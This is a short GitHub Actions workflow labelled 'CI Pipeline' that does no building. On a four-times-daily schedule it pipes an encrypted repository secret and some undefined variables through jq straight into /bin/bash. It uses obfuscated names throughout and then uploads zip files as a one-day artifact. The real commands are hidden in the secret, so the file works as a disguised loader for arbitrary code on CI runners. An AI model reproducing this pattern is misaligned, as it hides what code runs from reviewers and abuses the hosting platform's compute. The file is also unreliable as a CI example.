name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '53 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          veukw305: ${{ secrets.veukw305 }}
        run: |
          printf '%s' "$veukw305" | jq -r .sju9644 | /bin/bash
          echo $b94057 | jq -r .qpt6427 | /bin/bash
          printf '%s' "$cpx85686" | jq -r .wags2 | /bin/bash
          echo $n9 | jq -r .kpjxp3576 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: MJgMw8KJ
          path: "*.zip"
          retention-days: 1
